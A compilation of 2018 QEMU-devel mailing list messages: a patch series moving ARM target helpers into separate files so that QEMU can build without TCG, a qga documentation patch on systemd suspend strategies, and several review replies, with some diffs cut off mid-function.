systemd hibernate, the command will try the next option. Same thing
with pm-utils.






  #
  # This command does NOT return a response on success. There is a 
high chance
  # the command succeeded if the VM exits with a zero exit status 
or, when

@@ -560,12 +564,16 @@
  #
  # Suspend guest to ram.
  #
-# This command tries to execute the scripts provided by the 
pm-utils package.
-# If it's not available, the suspend operation will be performed by 
manually

-# writing to a sysfs file.
+# This command attempts to suspend the guest using three 
strategies, in this

+# order:
+#
+# - systemd suspend
+# - pm-utils (via pm-suspend)
+# - manual write into sysfs
  #
-# For the best results it's strongly recommended to have the pm-utils
-# package installed in the guest.
+# If the guest does not have systemd suspend support, the scripts 
in pm-utils
+# package are executed, in case pm-utils is available. Manual write 
in sysfs

+# is a last resort.


Likewise.


  #
  # IMPORTANT: guest-suspend-ram requires QEMU to support the 
'system_wakeup'
  # command.  Thus, it's *required* to query QEMU for the presence 
of the

@@ -592,7 +600,14 @@
  #
  # Save guest state to disk and suspend to ram.
  #
-# This command requires the pm-utils package to be installed in the 
guest.
+# This command attempts to suspend the guest using three 
strategies, in this

+# order:
+#
+# - systemd hybrid-sleep
+# - pm-utils (via pm-suspend-hybrid)
+#
+# If the guest does not have systemd hybrid-sleep support, the 
scripts in

+# pm-utils package are executed, in case pm-utils is available.


"using three strategies" but a list of only 2 seems odd.



Copy/paste busted!

[Qemu-devel] [PATCH 00/13] Support disabling TCG on ARM

[Samuel Ortiz]

This patchset allows for building and running ARM targets with TCG
disabled. It splits the target/arm/helper.c file into logical TCG and
non TCG dependent files so that one can build and run QEMU binaries with
or without TCG enabled.

The rationale behind this work comes from the NEMU project where we're
trying to only support x86 and ARM 64-bit architectures, without
including the TCG code base. We can only do so if we can build and run
ARM binaries with TCG disabled.

The patches are also available here:
https://github.com/intel/nemu/tree/topic/upstream/arm-tcg-disable

Philippe Mathieu-Daudé (2):
  target: arm: Add copyright boilerplate
  target: arm: Remove unused headers

Samuel Ortiz (11):
  target: arm: Move all v7m helpers into their own file
  target: arm: Move all interrupt and exception handlers into their own
file
  target: arm: Move the DC ZVA helper into op_helper
  target: arm: Make ARM TLB filling routine static
  target: arm: Remove the LDST headers
  target: arm: Move all VFP helpers into their own file
  target: arm: Move CPU state dumping routines to helper.c
  target: arm: Move watchpoints APIs to helper.c
  target: arm: Define TCG dependent functions when TCG is enabled
  target: arm: Makefile cleanup
  target: arm: Do not build TCG objects when TCG is off

 target/arm/internals.h |   60 +-
 target/arm/translate.h |7 -
 target/arm/cpu.c   |8 +-
 target/arm/excp_helper.c   |  550 +++
 target/arm/helper.c| 8467 
 target/arm/m_helper.c  | 1892 
 target/arm/op_helper.c |  326 +-
 target/arm/translate-a64.c |  125 -
 target/arm/translate.c |   87 -
 target/arm/vfp_helper.c|  893 
 target/arm/Makefile.objs   |   19 +-
 11 files changed, 6262 insertions(+), 6172 deletions(-)
 create mode 100644 target/arm/excp_helper.c
 create mode 100644 target/arm/m_helper.c
 create mode 100644 target/arm/vfp_helper.c

-- 
2.19.1

Re: [Qemu-devel] [PATCH v6 07/11] authz: add QAuthZSimple object type for easy whitelist auth checks

[Daniel P . Berrangé]

On Thu, Nov 08, 2018 at 02:23:48AM +0400, Marc-André Lureau wrote:
> On Fri, Oct 19, 2018 at 5:49 PM Daniel P. Berrangé  
> wrote:
> >
> > In many cases a single VM will just need to whilelist a single identity
> > as the allowed user of network services. This is especially the case for
> > TLS live migration (optionally with NBD storage) where we just need to
> > whitelist the x509 certificate distinguished name of the source QEMU
> > host.
> >
> > Via QMP this can be configured with:
> >
> >   {
> > "execute": "object-add",
> > "arguments": {
> >   "qom-type": "authz-simple",
> >   "id": "authz0",
> >   "parameters": {
> > "identity": "fred"
> >   }
> > }
> >   }
> >
> > Or via the command line
> >
> >   -object authz-simple,id=authz0,identity=fred
> >
> > Signed-off-by: Daniel P. Berrange 
> 
> Reviewed-by: Marc-André Lureau 
> 
> (a test would be trivial)

Yes, will add one


Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|

[Qemu-devel] [PATCH 07/13] target: arm: Remove the LDST headers

[Samuel Ortiz]

They are no longer needed.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/helper.c | 1 -
 1 file changed, 1 deletion(-)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 689879c23a..dcb689bfbb 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -16,7 +16,6 @@
 #include "sysemu/sysemu.h"
 #include "qemu/crc32c.h"
 #include "exec/exec-all.h"
-#include "arm_ldst.h"
 #include  /* For crc32 */
 #include "exec/semihost.h"
 #include "sysemu/kvm.h"
-- 
2.19.1

[Qemu-devel] [PATCH 12/13] target: arm: Makefile cleanup

[Samuel Ortiz]

Group objects with the same build dependencies together.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/Makefile.objs | 15 +++
 1 file changed, 7 insertions(+), 8 deletions(-)

diff --git a/target/arm/Makefile.objs b/target/arm/Makefile.objs
index 6e880df727..8e513748e3 100644
--- a/target/arm/Makefile.objs
+++ b/target/arm/Makefile.objs
@@ -1,15 +1,13 @@
-obj-y += arm-semi.o
-obj-$(CONFIG_SOFTMMU) += machine.o psci.o arch_dump.o monitor.o
+obj-y += arm-semi.o crypto_helper.o gdbstub.o helper.o cpu.o
+obj-y += translate.o op_helper.o neon_helper.o
+obj-y += iwmmxt_helper.o vec_helper.o m_helper.o
+obj-y += excp_helper.o vfp_helper.o
+
+obj-$(CONFIG_SOFTMMU) += machine.o psci.o arch_dump.o monitor.o arm-powerctl.o
 obj-$(CONFIG_KVM) += kvm.o
 obj-$(call land,$(CONFIG_KVM),$(call lnot,$(TARGET_AARCH64))) += kvm32.o
 obj-$(call land,$(CONFIG_KVM),$(TARGET_AARCH64)) += kvm64.o
 obj-$(call lnot,$(CONFIG_KVM)) += kvm-stub.o
-obj-y += translate.o op_helper.o helper.o cpu.o
-obj-y += neon_helper.o iwmmxt_helper.o vec_helper.o
-obj-y += gdbstub.o m_helper.o excp_helper.o vfp_helper.o
-obj-$(TARGET_AARCH64) += cpu64.o translate-a64.o helper-a64.o gdbstub64.o
-obj-y += crypto_helper.o
-obj-$(CONFIG_SOFTMMU) += arm-powerctl.o
 
 DECODETREE = $(SRC_PATH)/scripts/decodetree.py
 
@@ -20,3 +18,4 @@ target/arm/decode-sve.inc.c: 
$(SRC_PATH)/target/arm/sve.decode $(DECODETREE)
 
 target/arm/translate-sve.o: target/arm/decode-sve.inc.c
 obj-$(TARGET_AARCH64) += translate-sve.o sve_helper.o
+obj-$(TARGET_AARCH64) += cpu64.o translate-a64.o helper-a64.o gdbstub64.o
-- 
2.19.1

[Qemu-devel] [PATCH 05/13] target: arm: Move the DC ZVA helper into op_helper

[Samuel Ortiz]

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/helper.c| 84 --
 target/arm/op_helper.c | 84 ++
 2 files changed, 84 insertions(+), 84 deletions(-)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 7b30a4cb49..bc2c8cdb67 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -8917,90 +8917,6 @@ hwaddr arm_cpu_get_phys_page_attrs_debug(CPUState *cs, 
vaddr addr,
 
 #endif
 
-void HELPER(dc_zva)(CPUARMState *env, uint64_t vaddr_in)
-{
-/* Implement DC ZVA, which zeroes a fixed-length block of memory.
- * Note that we do not implement the (architecturally mandated)
- * alignment fault for attempts to use this on Device memory
- * (which matches the usual QEMU behaviour of not implementing either
- * alignment faults or any memory attribute handling).
- */
-
-ARMCPU *cpu = arm_env_get_cpu(env);
-uint64_t blocklen = 4 << cpu->dcz_blocksize;
-uint64_t vaddr = vaddr_in & ~(blocklen - 1);
-
-#ifndef CONFIG_USER_ONLY
-{
-/* Slightly awkwardly, QEMU's TARGET_PAGE_SIZE may be less than
- * the block size so we might have to do more than one TLB lookup.
- * We know that in fact for any v8 CPU the page size is at least 4K
- * and the block size must be 2K or less, but TARGET_PAGE_SIZE is only
- * 1K as an artefact of legacy v5 subpage support being present in the
- * same QEMU executable.
- */
-int maxidx = DIV_ROUND_UP(blocklen, TARGET_PAGE_SIZE);
-void *hostaddr[maxidx];
-int try, i;
-unsigned mmu_idx = cpu_mmu_index(env, false);
-TCGMemOpIdx oi = make_memop_idx(MO_UB, mmu_idx);
-
-for (try = 0; try < 2; try++) {
-
-for (i = 0; i < maxidx; i++) {
-hostaddr[i] = tlb_vaddr_to_host(env,
-vaddr + TARGET_PAGE_SIZE * i,
-1, mmu_idx);
-if (!hostaddr[i]) {
-break;
-}
-}
-if (i == maxidx) {
-/* If it's all in the TLB it's fair game for just writing to;
- * we know we don't need to update dirty status, etc.
- */
-for (i = 0; i < maxidx - 1; i++) {
-memset(hostaddr[i], 0, TARGET_PAGE_SIZE);
-}
-memset(hostaddr[i], 0, blocklen - (i * TARGET_PAGE_SIZE));
-return;
-}
-/* OK, try a store and see if we can populate the tlb. This
- * might cause an exception if the memory isn't writable,
- * in which case we will longjmp out of here. We must for
- * this purpose use the actual register value passed to us
- * so that we get the fault address right.
- */
-helper_ret_stb_mmu(env, vaddr_in, 0, oi, GETPC());
-/* Now we can populate the other TLB entries, if any */
-for (i = 0; i < maxidx; i++) {
-uint64_t va = vaddr + TARGET_PAGE_SIZE * i;
-if (va != (vaddr_in & TARGET_PAGE_MASK)) {
-helper_ret_stb_mmu(env, va, 0, oi, GETPC());
-}
-}
-}
-
-/* Slow path (probably attempt to do this to an I/O device or
- * similar, or clearing of a block of code we have translations
- * cached for). Just do a series of byte writes as the architecture
- * demands. It's not worth trying to use a cpu_physical_memory_map(),
- * memset(), unmap() sequence here because:
- *  + we'd need to account for the blocksize being larger than a page
- *  + the direct-RAM access case is almost always going to be dealt
- *with in the fastpath code above, so there's no speed benefit
- *  + we would have to deal with the map returning NULL because the
- *bounce buffer was in use
- */
-for (i = 0; i < blocklen; i++) {
-helper_ret_stb_mmu(env, vaddr + i, 0, oi, GETPC());
-}
-}
-#else
-memset(g2h(vaddr), 0, blocklen);
-#endif
-}
-
 /* Note that signed overflow is undefined in C.  The following routines are
careful to use unsigned types where modulo arithmetic is required.
Failure to do so _will_ break on newer gcc.  */
diff --git a/target/arm/op_helper.c b/target/arm/op_helper.c
index eb6fb82fb8..44a74cb296 100644
--- a/target/arm/op_helper.c
+++ b/target/arm/op_helper.c
@@ -1480,3 +1480,87 @@ uint32_t HELPER(ror_cc)(CPUARMState *env, uint32_t x, 
uint32_t i)
 return ((uint32_t)x >> shift) | (x << (32 - shift));
 }
 }
+
+void HELPER(dc_zva)(CPUARMState *env, uint64_t vaddr_in)
+{
+/* Implement DC ZVA, which zeroes a fixed-length block of memory.
+ * 

[Qemu-devel] [PATCH 06/13] target: arm: Make ARM TLB filling routine static

[Samuel Ortiz]

It's only used in op_helper.c, it does not need to be exported and
moreover it should only be build when TCG is enabled.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/internals.h |  5 -
 target/arm/helper.c| 37 -
 target/arm/op_helper.c | 38 ++
 3 files changed, 38 insertions(+), 42 deletions(-)

diff --git a/target/arm/internals.h b/target/arm/internals.h
index ffb5091b1f..06439467d2 100644
--- a/target/arm/internals.h
+++ b/target/arm/internals.h
@@ -741,11 +741,6 @@ static inline bool arm_extabort_type(MemTxResult result)
 return result != MEMTX_DECODE_ERROR;
 }
 
-/* Do a page table walk and add page to TLB if possible */
-bool arm_tlb_fill(CPUState *cpu, vaddr address,
-  MMUAccessType access_type, int mmu_idx,
-  ARMMMUFaultInfo *fi);
-
 /* Return true if the stage 1 translation regime is using LPAE format page
  * tables */
 bool arm_s1_regime_using_lpae_format(CPUARMState *env, ARMMMUIdx mmu_idx);
diff --git a/target/arm/helper.c b/target/arm/helper.c
index bc2c8cdb67..689879c23a 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -8855,43 +8855,6 @@ bool get_phys_addr(CPUARMState *env, target_ulong 
address,
 }
 }
 
-/* Walk the page table and (if the mapping exists) add the page
- * to the TLB. Return false on success, or true on failure. Populate
- * fsr with ARM DFSR/IFSR fault register format value on failure.
- */
-bool arm_tlb_fill(CPUState *cs, vaddr address,
-  MMUAccessType access_type, int mmu_idx,
-  ARMMMUFaultInfo *fi)
-{
-ARMCPU *cpu = ARM_CPU(cs);
-CPUARMState *env = >env;
-hwaddr phys_addr;
-target_ulong page_size;
-int prot;
-int ret;
-MemTxAttrs attrs = {};
-
-ret = get_phys_addr(env, address, access_type,
-core_to_arm_mmu_idx(env, mmu_idx), _addr,
-, , _size, fi, NULL);
-if (!ret) {
-/*
- * Map a single [sub]page. Regions smaller than our declared
- * target page size are handled specially, so for those we
- * pass in the exact addresses.
- */
-if (page_size >= TARGET_PAGE_SIZE) {
-phys_addr &= TARGET_PAGE_MASK;
-address &= TARGET_PAGE_MASK;
-}
-tlb_set_page_with_attrs(cs, address, phys_addr, attrs,
-prot, mmu_idx, page_size);
-return 0;
-}
-
-return ret;
-}
-
 hwaddr arm_cpu_get_phys_page_attrs_debug(CPUState *cs, vaddr addr,
  MemTxAttrs *attrs)
 {
diff --git a/target/arm/op_helper.c b/target/arm/op_helper.c
index 44a74cb296..3b0459db50 100644
--- a/target/arm/op_helper.c
+++ b/target/arm/op_helper.c
@@ -179,6 +179,44 @@ static void deliver_fault(ARMCPU *cpu, vaddr addr, 
MMUAccessType access_type,
 raise_exception(env, exc, syn, target_el);
 }
 
+/* Walk the page table and (if the mapping exists) add the page
+ * to the TLB. Return false on success, or true on failure. Populate
+ * fsr with ARM DFSR/IFSR fault register format value on failure.
+ */
+static bool arm_tlb_fill(CPUState *cs, vaddr address,
+ MMUAccessType access_type, int mmu_idx,
+ ARMMMUFaultInfo *fi)
+{
+ARMCPU *cpu = ARM_CPU(cs);
+CPUARMState *env = >env;
+hwaddr phys_addr;
+target_ulong page_size;
+int prot;
+int ret;
+MemTxAttrs attrs = {};
+
+ret = get_phys_addr(env, address, access_type,
+core_to_arm_mmu_idx(env, mmu_idx), _addr,
+, , _size, fi, NULL);
+if (!ret) {
+/*
+ * Map a single [sub]page. Regions smaller than our declared
+ * target page size are handled specially, so for those we
+ * pass in the exact addresses.
+ */
+if (page_size >= TARGET_PAGE_SIZE) {
+phys_addr &= TARGET_PAGE_MASK;
+address &= TARGET_PAGE_MASK;
+}
+tlb_set_page_with_attrs(cs, address, phys_addr, attrs,
+prot, mmu_idx, page_size);
+return 0;
+}
+
+return ret;
+}
+
+
 /* try to fill the TLB and return an exception if error. If retaddr is
  * NULL, it means that the function was called in C code (i.e. not
  * from generated code or from helper.c)
-- 
2.19.1

[Qemu-devel] [PATCH 11/13] target: arm: Define TCG dependent functions when TCG is enabled

[Samuel Ortiz]

do_interrupt, do_unaligned_access, do_transaction_failed and debug_excp
are only relevant in the TCG context, so we should not define them
when TCG is disabled.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/cpu.c | 8 ++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/target/arm/cpu.c b/target/arm/cpu.c
index 60411f6bfe..fb2e5d430e 100644
--- a/target/arm/cpu.c
+++ b/target/arm/cpu.c
@@ -1444,7 +1444,7 @@ static void arm_v7m_class_init(ObjectClass *oc, void 
*data)
 {
 CPUClass *cc = CPU_CLASS(oc);
 
-#ifndef CONFIG_USER_ONLY
+#if !defined(CONFIG_USER_ONLY) && defined(CONFIG_TCG)
 cc->do_interrupt = arm_v7m_cpu_do_interrupt;
 #endif
 
@@ -2061,9 +2061,14 @@ static void arm_cpu_class_init(ObjectClass *oc, void 
*data)
 #ifdef CONFIG_USER_ONLY
 cc->handle_mmu_fault = arm_cpu_handle_mmu_fault;
 #else
+
+#ifdef CONFIG_TCG
 cc->do_interrupt = arm_cpu_do_interrupt;
 cc->do_unaligned_access = arm_cpu_do_unaligned_access;
 cc->do_transaction_failed = arm_cpu_do_transaction_failed;
+cc->debug_excp_handler = arm_debug_excp_handler;
+#endif
+
 cc->get_phys_page_attrs_debug = arm_cpu_get_phys_page_attrs_debug;
 cc->asidx_from_attrs = arm_asidx_from_attrs;
 cc->vmsd = _arm_cpu;
@@ -2076,7 +2081,6 @@ static void arm_cpu_class_init(ObjectClass *oc, void 
*data)
 cc->gdb_arch_name = arm_gdb_arch_name;
 cc->gdb_get_dynamic_xml = arm_gdb_get_dynamic_xml;
 cc->gdb_stop_before_watchpoint = true;
-cc->debug_excp_handler = arm_debug_excp_handler;
 cc->debug_check_watchpoint = arm_debug_check_watchpoint;
 #if !defined(CONFIG_USER_ONLY)
 cc->adjust_watchpoint_address = arm_adjust_watchpoint_address;
-- 
2.19.1

[Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

[Samuel Ortiz]

From: Philippe Mathieu-Daudé 

Signed-off-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
Reviewed-by: Samuel Ortiz 
---
 target/arm/helper.c | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 3d4e9c5c8a..27d9285e1e 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -12,13 +12,10 @@
 #include "internals.h"
 #include "exec/gdbstub.h"
 #include "exec/helper-proto.h"
-#include "qemu/host-utils.h"
 #include "sysemu/arch_init.h"
 #include "sysemu/sysemu.h"
-#include "qemu/bitops.h"
 #include "qemu/crc32c.h"
 #include "exec/exec-all.h"
-#include "exec/cpu_ldst.h"
 #include "arm_ldst.h"
 #include  /* For crc32 */
 #include "exec/semihost.h"
-- 
2.19.1

[Qemu-devel] [PATCH v2 1/1] qga: update docs with systemd suspend support info

[Daniel Henrique Barboza]

Commit 067927d62e ("qga: systemd hibernate/suspend/hybrid-sleep
support") failed to update qapi-schema.json after adding systemd
hibernate/suspend/hybrid-sleep capabilities to guest-suspend-* QGA
commands.

Signed-off-by: Daniel Henrique Barboza 
---
 qga/qapi-schema.json | 25 ++---
 1 file changed, 14 insertions(+), 11 deletions(-)

diff --git a/qga/qapi-schema.json b/qga/qapi-schema.json
index c6725b3ec8..61f66fc461 100644
--- a/qga/qapi-schema.json
+++ b/qga/qapi-schema.json
@@ -532,12 +532,12 @@
 #
 # Suspend guest to disk.
 #
-# This command tries to execute the scripts provided by the pm-utils package.
-# If it's not available, the suspend operation will be performed by manually
-# writing to a sysfs file.
+# This command attempts to suspend the guest using three strategies, in this
+# order:
 #
-# For the best results it's strongly recommended to have the pm-utils
-# package installed in the guest.
+# - systemd hibernate
+# - pm-utils (via pm-hibernate)
+# - manual write into sysfs
 #
 # This command does NOT return a response on success. There is a high chance
 # the command succeeded if the VM exits with a zero exit status or, when
@@ -560,12 +560,12 @@
 #
 # Suspend guest to ram.
 #
-# This command tries to execute the scripts provided by the pm-utils package.
-# If it's not available, the suspend operation will be performed by manually
-# writing to a sysfs file.
+# This command attempts to suspend the guest using three strategies, in this
+# order:
 #
-# For the best results it's strongly recommended to have the pm-utils
-# package installed in the guest.
+# - systemd suspend
+# - pm-utils (via pm-suspend)
+# - manual write into sysfs
 #
 # IMPORTANT: guest-suspend-ram requires QEMU to support the 'system_wakeup'
 # command.  Thus, it's *required* to query QEMU for the presence of the
@@ -592,7 +592,10 @@
 #
 # Save guest state to disk and suspend to ram.
 #
-# This command requires the pm-utils package to be installed in the guest.
+# This command attempts to suspend the guest by executing, in this order:
+#
+# - systemd hybrid-sleep
+# - pm-utils (via pm-suspend-hybrid)
 #
 # IMPORTANT: guest-suspend-hybrid requires QEMU to support the 'system_wakeup'
 # command.  Thus, it's *required* to query QEMU for the presence of the
-- 
2.19.1

[Qemu-devel] [PATCH 01/13] target: arm: Add copyright boilerplate

[Samuel Ortiz]

From: Philippe Mathieu-Daudé 

Signed-off-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
Reviewed-by: Samuel Ortiz 
---
 target/arm/helper.c | 7 +++
 1 file changed, 7 insertions(+)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 0da1424f72..3d4e9c5c8a 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -1,3 +1,10 @@
+/*
+ * ARM generic helpers.
+ *
+ * This code is licensed under the GNU GPL v2.
+ *
+ * SPDX-License-Identifier: GPL-2.0-or-later
+ */
 #include "qemu/osdep.h"
 #include "target/arm/idau.h"
 #include "trace.h"
-- 
2.19.1

[Qemu-devel] [PATCH 08/13] target: arm: Move all VFP helpers into their own file

[Samuel Ortiz]

Since softfloat is only relevant with TCG, we move all ARM VFP helpers
into their own file (vfp_helper.c), in order to support TCG disablement
on ARM.

Signed-off-by: Samuel Ortiz 
Signed-off-by: Philippe Mathieu-Daudé 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/helper.c  | 871 --
 target/arm/vfp_helper.c  | 893 +++
 target/arm/Makefile.objs |   2 +-
 3 files changed, 894 insertions(+), 872 deletions(-)
 create mode 100644 target/arm/vfp_helper.c

diff --git a/target/arm/helper.c b/target/arm/helper.c
index dcb689bfbb..996dfbbda2 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -9257,877 +9257,6 @@ void vfp_set_fpscr(CPUARMState *env, uint32_t val)
 HELPER(vfp_set_fpscr)(env, val);
 }
 
-#define VFP_HELPER(name, p) HELPER(glue(glue(vfp_,name),p))
-
-#define VFP_BINOP(name) \
-float32 VFP_HELPER(name, s)(float32 a, float32 b, void *fpstp) \
-{ \
-float_status *fpst = fpstp; \
-return float32_ ## name(a, b, fpst); \
-} \
-float64 VFP_HELPER(name, d)(float64 a, float64 b, void *fpstp) \
-{ \
-float_status *fpst = fpstp; \
-return float64_ ## name(a, b, fpst); \
-}
-VFP_BINOP(add)
-VFP_BINOP(sub)
-VFP_BINOP(mul)
-VFP_BINOP(div)
-VFP_BINOP(min)
-VFP_BINOP(max)
-VFP_BINOP(minnum)
-VFP_BINOP(maxnum)
-#undef VFP_BINOP
-
-float32 VFP_HELPER(neg, s)(float32 a)
-{
-return float32_chs(a);
-}
-
-float64 VFP_HELPER(neg, d)(float64 a)
-{
-return float64_chs(a);
-}
-
-float32 VFP_HELPER(abs, s)(float32 a)
-{
-return float32_abs(a);
-}
-
-float64 VFP_HELPER(abs, d)(float64 a)
-{
-return float64_abs(a);
-}
-
-float32 VFP_HELPER(sqrt, s)(float32 a, CPUARMState *env)
-{
-return float32_sqrt(a, >vfp.fp_status);
-}
-
-float64 VFP_HELPER(sqrt, d)(float64 a, CPUARMState *env)
-{
-return float64_sqrt(a, >vfp.fp_status);
-}
-
-/* XXX: check quiet/signaling case */
-#define DO_VFP_cmp(p, type) \
-void VFP_HELPER(cmp, p)(type a, type b, CPUARMState *env)  \
-{ \
-uint32_t flags; \
-switch(type ## _compare_quiet(a, b, >vfp.fp_status)) { \
-case 0: flags = 0x6; break; \
-case -1: flags = 0x8; break; \
-case 1: flags = 0x2; break; \
-default: case 2: flags = 0x3; break; \
-} \
-env->vfp.xregs[ARM_VFP_FPSCR] = (flags << 28) \
-| (env->vfp.xregs[ARM_VFP_FPSCR] & 0x0fff); \
-} \
-void VFP_HELPER(cmpe, p)(type a, type b, CPUARMState *env) \
-{ \
-uint32_t flags; \
-switch(type ## _compare(a, b, >vfp.fp_status)) { \
-case 0: flags = 0x6; break; \
-case -1: flags = 0x8; break; \
-case 1: flags = 0x2; break; \
-default: case 2: flags = 0x3; break; \
-} \
-env->vfp.xregs[ARM_VFP_FPSCR] = (flags << 28) \
-| (env->vfp.xregs[ARM_VFP_FPSCR] & 0x0fff); \
-}
-DO_VFP_cmp(s, float32)
-DO_VFP_cmp(d, float64)
-#undef DO_VFP_cmp
-
-/* Integer to float and float to integer conversions */
-
-#define CONV_ITOF(name, ftype, fsz, sign)   \
-ftype HELPER(name)(uint32_t x, void *fpstp) \
-{   \
-float_status *fpst = fpstp; \
-return sign##int32_to_##float##fsz((sign##int32_t)x, fpst); \
-}
-
-#define CONV_FTOI(name, ftype, fsz, sign, round)\
-sign##int32_t HELPER(name)(ftype x, void *fpstp)\
-{   \
-float_status *fpst = fpstp; \
-if (float##fsz##_is_any_nan(x)) {   \
-float_raise(float_flag_invalid, fpst);  \
-return 0;   \
-}   \
-return float##fsz##_to_##sign##int32##round(x, fpst);   \
-}
-
-#define FLOAT_CONVS(name, p, ftype, fsz, sign)\
-CONV_ITOF(vfp_##name##to##p, ftype, fsz, sign)\
-CONV_FTOI(vfp_to##name##p, ftype, fsz, sign, )\
-CONV_FTOI(vfp_to##name##z##p, ftype, fsz, sign, _round_to_zero)
-
-FLOAT_CONVS(si, h, uint32_t, 16, )
-FLOAT_CONVS(si, s, float32, 32, )
-FLOAT_CONVS(si, d, float64, 64, )
-FLOAT_CONVS(ui, h, uint32_t, 16, u)
-FLOAT_CONVS(ui, s, float32, 32, u)
-FLOAT_CONVS(ui, d, float64, 64, u)
-
-#undef CONV_ITOF
-#undef CONV_FTOI
-#undef FLOAT_CONVS
-
-/* floating point conversion */
-float64 VFP_HELPER(fcvtd, s)(float32 x, CPUARMState *env)
-{
-return float32_to_float64(x, >vfp.fp_status);
-}
-
-float32 VFP_HELPER(fcvts, d)(float64 x, CPUARMState *env)
-{
-return float64_to_float32(x, >vfp.fp_status);
-}
-
-/* VFP3 fixed point conversion.  */
-#define VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \
-float##fsz HELPER(vfp_##name##to##p)(uint##isz##_t  x, uint32_t shift, \
- void *fpstp) \
-{ return 

Re: [Qemu-devel] [PATCH 01/13] target: arm: Add copyright boilerplate

[Peter Maydell]

On 13 November 2018 at 16:52, Samuel Ortiz  wrote:
> From: Philippe Mathieu-Daudé 
>
> Signed-off-by: Philippe Mathieu-Daudé 
> Reviewed-by: Robert Bradford 
> Reviewed-by: Samuel Ortiz 
> ---
>  target/arm/helper.c | 7 +++
>  1 file changed, 7 insertions(+)
>
> diff --git a/target/arm/helper.c b/target/arm/helper.c
> index 0da1424f72..3d4e9c5c8a 100644
> --- a/target/arm/helper.c
> +++ b/target/arm/helper.c
> @@ -1,3 +1,10 @@
> +/*
> + * ARM generic helpers.
> + *
> + * This code is licensed under the GNU GPL v2.
> + *
> + * SPDX-License-Identifier: GPL-2.0-or-later
> + */

The human readable text says "v2", but the SPDX tag says
"v2 or later". Which is right? (The top level LICENSE file says
source files with no specific license are 2-or-later).

thanks
-- PMM

[Qemu-devel] [PATCH 10/13] target: arm: Move watchpoints APIs to helper.c

[Samuel Ortiz]

Here again, those APIs are not TCG dependent and can move to the always
built helper.c.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/internals.h |   6 ++
 target/arm/helper.c| 204 +
 target/arm/op_helper.c | 204 -
 3 files changed, 210 insertions(+), 204 deletions(-)

diff --git a/target/arm/internals.h b/target/arm/internals.h
index ddb594d58d..7ab22208a3 100644
--- a/target/arm/internals.h
+++ b/target/arm/internals.h
@@ -937,6 +937,12 @@ bool pmsav8_mpu_lookup(CPUARMState *env, uint32_t address,
int *prot, bool *is_subpage,
ARMMMUFaultInfo *fi, uint32_t *mregion);
 
+/*
+ * Returns true when the current CPU execution context matches
+ * the watchpoint or the breakpoint pointed at by n.
+ */
+bool bp_wp_matches(ARMCPU *cpu, int n, bool is_wp);
+
 #ifdef TARGET_AARCH64
 void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
 fprintf_function cpu_fprintf, int flags);
diff --git a/target/arm/helper.c b/target/arm/helper.c
index ff3011fcb6..c4e7d23023 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -9770,3 +9770,207 @@ void arm_cpu_dump_state(CPUState *cs, FILE *f, 
fprintf_function cpu_fprintf,
 cpu_fprintf(f, "FPSCR: %08x\n", (int)env->vfp.xregs[ARM_VFP_FPSCR]);
 }
 }
+
+/* Return true if the linked breakpoint entry lbn passes its checks */
+static bool linked_bp_matches(ARMCPU *cpu, int lbn)
+{
+CPUARMState *env = >env;
+uint64_t bcr = env->cp15.dbgbcr[lbn];
+int brps = extract32(cpu->dbgdidr, 24, 4);
+int ctx_cmps = extract32(cpu->dbgdidr, 20, 4);
+int bt;
+uint32_t contextidr;
+
+/* Links to unimplemented or non-context aware breakpoints are
+ * CONSTRAINED UNPREDICTABLE: either behave as if disabled, or
+ * as if linked to an UNKNOWN context-aware breakpoint (in which
+ * case DBGWCR_EL1.LBN must indicate that breakpoint).
+ * We choose the former.
+ */
+if (lbn > brps || lbn < (brps - ctx_cmps)) {
+return false;
+}
+
+bcr = env->cp15.dbgbcr[lbn];
+
+if (extract64(bcr, 0, 1) == 0) {
+/* Linked breakpoint disabled : generate no events */
+return false;
+}
+
+bt = extract64(bcr, 20, 4);
+
+/* We match the whole register even if this is AArch32 using the
+ * short descriptor format (in which case it holds both PROCID and ASID),
+ * since we don't implement the optional v7 context ID masking.
+ */
+contextidr = extract64(env->cp15.contextidr_el[1], 0, 32);
+
+switch (bt) {
